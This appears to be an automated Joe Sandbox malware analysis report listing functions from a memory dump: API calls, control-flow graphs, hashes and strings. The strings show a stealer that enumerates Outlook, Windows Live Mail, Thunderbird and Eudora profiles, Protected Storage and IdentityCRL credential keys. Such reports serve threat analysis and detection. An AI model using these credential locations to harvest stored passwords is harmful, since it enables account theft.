                                                                                                                                                                                                                          • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                          • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 443 407c87-407c90 444 407c92-407cb1 FindFirstFileA 443->444 445 407cb3-407cc7 FindNextFileA 443->445 446 407cce-407cd3 444->446 447 407cd5-407d03 strlen * 2 445->447 448 407cc9 call 407d1f 445->448 446->447 450 407d18-407d1e 446->450 451 407d12 447->451 452 407d05-407d10 call 406e81 447->452 448->446 454 407d15-407d17 451->454 452->454 454->450
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                                                          • API String ID: 379999529-2881260426
                                                                                                                                                                                                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401FA8
                                                                                                                                                                                                                          • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401FFA
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402027
                                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402092
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00402098
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020A6
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020D9
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020E7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040200F
                                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                          • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                          • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                                          • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                            • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                            • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                            • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                          • API String ID: 745651260-375988210
                                                                                                                                                                                                                          • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                          • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                                                          • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                                                          • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                                                                                                                          • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                          • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                                                            • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                            • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                            • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                            • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                          • API String ID: 2768085393-888555734
                                                                                                                                                                                                                          • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                          • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3662548030-0
                                                                                                                                                                                                                          • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                          • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                                                            • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                                                            • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                            • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                            • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443866
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443881
                                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                                                          • Store Root, xrefs: 00443892
                                                                                                                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                          • API String ID: 832325562-2578778931
                                                                                                                                                                                                                          • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                          • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 329 40efdf-40efea call 404780 318->329 330 40ef8f-40efb3 call 4047a0 318->330 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 328 40f036-40f044 322->328 328->315 329->320 330->329 335 40efb5-40efb8 330->335 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->329 337->336
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                                                            • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                          • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                          • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                                                            • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                            • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                                                                                                                          • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                          • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 354 404a94-404abd LoadLibraryA 355 404ae7-404aef 354->355 356 404abf-404acd GetProcAddress 354->356 362 404af0-404af5 355->362 357 404ad8-404ae1 FreeLibrary 356->357 358 404acf-404ad3 356->358 357->355 359 404ae3-404ae5 357->359 361 404ad6 358->361 359->362 361->357 363 404af7-404b0d MessageBoxA 362->363 364 404b0e-404b12 362->364
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                          • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                                          • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
